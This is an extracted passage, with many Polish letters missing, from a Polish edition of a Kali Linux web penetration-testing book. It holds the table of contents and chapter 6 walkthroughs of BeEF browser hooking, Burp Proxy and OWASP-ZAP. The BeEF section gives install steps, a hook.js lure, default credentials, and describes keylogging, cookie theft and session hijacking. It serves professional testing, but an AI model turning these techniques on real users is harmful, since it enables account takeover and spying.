Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf ·...

58

Transcript of Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf ·...

Page 1: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Tytuł oryginału Web Penetration Testing with Kali Linux

Tłumaczenie Grzegorz Kowalczyk

ISBN 978-83-246-9013-8

Copyright copy 2013 Packt Publishing

First published in the English language under the title bdquoWeb Penetration Testing with Kali Linuxrdquo

Polish edition copyright copy 2014 by Helion SA All rights reserved

All rights reserved No part of this book may be reproduced or transmitted in any form or by any means electronic or mechanical including photocopying recording or by any information storage retrieval system without permission from the Publisher

Wszelkie prawa zastrzeżone Nieautoryzowane rozpowszechnianie całości lub fragmentu niniejszej publikacji w jakiejkolwiek postaci jest zabronione Wykonywanie kopii metodą kserograficzną fotograficzną a także kopiowanie książki na nośniku filmowym magnetycznym lub innym powoduje naruszenie praw autorskich niniejszej publikacji

Wszystkie znaki występujące w tekście są zastrzeżonymi znakami firmowymi bądź towarowymi ich właścicieli

Autor oraz Wydawnictwo HELION dołożyli wszelkich starań by zawarte w tej książce informacje były kompletne i rzetelne Nie biorą jednak żadnej odpowiedzialności ani za ich wykorzystanie ani za związane z tym ewentualne naruszenie praw patentowych lub autorskich Autor oraz Wydawnictwo HELION nie ponoszą roacutewnież żadnej odpowiedzialności za ewentualne szkody wynikłe z wykorzystania informacji zawartych w książce

Wydawnictwo HELIONul Kościuszki 1c 44-100 GLIWICEtel 32 231 22 19 32 230 98 63e-mail helionhelionplWWW httphelionpl (księgarnia internetowa katalog książek)

Drogi CzytelnikuJeżeli chcesz ocenić tę książkę zajrzyj pod adres httphelionpluseropiniekaliliMożesz tam wpisać swoje uwagi spostrzeżenia recenzję

Printed in Poland

bull Kup książkębull Poleć książkę bull Oceń książkę

bull Księgarnia internetowabull Lubię to raquo Nasza społeczność

Spis tre ci

O autorach 9

O recenzentach 11

Wst p 15

Co znajdziesz w tej ksi ce 16Czego potrzebujesz do pracy z ksi k 17Dla kogo przeznaczona jest ta ksi ka 17Konwencje 18Errata 18Piractwo 19

Rozdzia 1 Przygotowania 21

Podstawowe za o enia testoacutew penetracyjnych aplikacji internetowych 23Metodologia przeprowadzania testoacutew penetracyjnych 24

Ocena ryzyka 30Testy penetracyjne z wykorzystaniem systemu Kali Linux mdash za o enia 34

Etap 1 Rekonesans 34Etap 2 Wyszukiwanie podatno ci 35Etap 3 Wykorzystywanie zidentyfikowanych podatno ci 36Etap 4 Podnoszenie uprawnie 37Etap 5 Utrzymanie zdobytego przyczoacute ka 37

Wprowadzenie do systemu Kali Linux 38Konfiguracja systemu Kali Linux 39

Uruchamianie systemu Kali Linux z no nika zewn trznego 39Instalowanie systemu Kali Linux 40Kali Linux i pierwsze uruchomienie w maszynie wirtualnej 46

Przegl d narz dzi dost pnych w systemie Kali Linux 46Podsumowanie 49

Kup książkę Poleć książkę

Spis tre ci

4

Rozdzia 2 Rekonesans 51

Zadania rekonesansu 52Rozpoznanie wst pne 53

Strona internetowa firmy 53roacuted a przechowuj ce historyczne wersje witryn internetowych 54

Regional Internet Registries czyli regionalni administratorzy adresoacutew IP 57System EDGAR 57Zasoby serwisoacutew spo eczno ciowych 58Zaufanie 59Oferty pracy 59Lokalizacja 60Wyszukiwarka Shodan 60Google hacking 61GHDB czyli Google Hacking Database 63Badanie zasoboacutew sieci komputerowych 65Rekonesans z wykorzystaniem protoko u ICMP 69Rekonesans z wykorzystaniem serweroacutew DNS 71Nmap 76FOCA mdash wyszukiwanie i analiza metadanych 83

Podsumowanie 89

Rozdzia 3 Ataki na serwery aplikacji internetowych 91

Wyszukiwanie podatno ci i luk w zabezpieczeniach 92Webshag 92Skipfish 95ProxyStrike 98Vega 101Owasp-Zap 105Websploit 112

Wykorzystywanie znalezionych luk w zabezpieczeniach (exploity) 113Metasploit 113w3af 120

Wykorzystywanie luk w zabezpieczeniach systemoacutew poczty elektronicznej 123Ataki typu brute-force 125

Hydra 125DirBuster 128WebSlayer 131

amanie hase 137John the Ripper 137

Ataki typu man-in-the-middle 139SSLStrip 140

Podsumowanie 145

Kup książkę Poleć książkę

Spis tre ci

5

Rozdzia 4 Ataki na klienty aplikacji internetowych 147

In ynieria spo eczna 148Pakiet SET mdash Social Engineer Toolkit 149

Zastosowanie pakietu SET do ataku z klonowaniem 151MitM Proxy 161Skanowanie hostoacutew 162

Skanowanie hostoacutew za pomoc pakietu Nessus 162Przechwytywanie i amanie hase u ytkownikoacutew 169

Has a w systemie Windows 171Has a w systemie Linux 173

Narz dzia do amania hase dost pne w systemie Kali Linux 174Johnny 174Programy hashcat i oclHashcat 177samdump2 178chntpw 180Ophcrack 183Crunch 185

Inne narz dzia dost pne w systemie Kali Linux 188Hash-identifier 188dictstat 189RainbowCrack (rcracki_mt) 189findmyhash 190phrasendrescher 190CmosPwd 190creddump 191

Podsumowanie 191

Rozdzia 5 Ataki na metody uwierzytelniania 193

Ataki na zarz dzanie sesjami 195Clickjacking 196

Przechwytywanie ciasteczek sesji 197Narz dzia do przechwytywania sesji 198

Wtyczki przegl darki Firefox 198Cookie Cadger 203Wireshark 206Pakiety Hamster i Ferret 208Atak typu man-in-the-middle 211Narz dzia dsniff i arpspoof 212Ettercap 214Driftnet 217

Wstrzykiwanie kodu SQL 218sqlmap 221

Ataki typu XSS (cross-site scripting) 223Testowanie podatno ci na ataki XSS 224

Techniki XSS cookie stealing i Authentication hijacking 225

Kup książkę Poleć książkę

Spis tre ci

6

Inne narz dzia 227urlsnarf 227acccheck 228hexinject 228Patator 229DBPwAudit 229

Podsumowanie 229

Rozdzia 6 Ataki na aplikacje internetowe i serwery WWW 231

BeEF mdash Browser Exploitation Framework 232FoxyProxy mdash wtyczka przegl darki Firefox 236BURP Proxy 238OWASP-ZAP 245Przechwytywanie hase mdash pakiet SET 249Fimap 254Ataki typu DoS 255

THX-SSL-DOS 257Scapy 259Slowloris 261

LOIC czyli Niskoorbitalne Dzia o Jonowehellip 263Inne narz dzia 266

DNSChef 266SniffJoke 267Siege 268Inundator 269TCPReplay 270

Podsumowanie 270

Rozdzia 7 Przeciwdzia anie i zapobieganie 271

Testowanie mechanizmoacutew obronnych 273Podstawowe wymogi bezpiecze stwa 273STIG 274Zarz dzanie aktualizacjami i poprawkami zabezpiecze 275Polityka zarz dzania has ami 277

Klonowanie rodowiska 278HTTrack 279Inne narz dzia do klonowania witryn 281

Obrona przed atakami typu man-in-the-middle 281Obrona przed atakami SSLstrip 284

Obrona przed atakami typu DoS 285Obrona przed przechwytywaniem ciasteczek 286Obrona przed atakami typu Clickjacking 287Informatyka ledcza 287

Uruchamianie systemu Kali Linux w trybie Forensics 290Analiza systemu plikoacutew za pomoc narz dzi systemu Kali Linux 291Inne narz dzia ledcze w systemie Kali Linux 295

Podsumowanie 300

Kup książkę Poleć książkę

Spis tre ci

7

Rozdzia 8 Tworzenie raportoacutew ko cowych 301

Zgodno ze standardami i procedurami 303Us ugi profesjonalne 304Dokumentacja 306Format raportu 307

Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

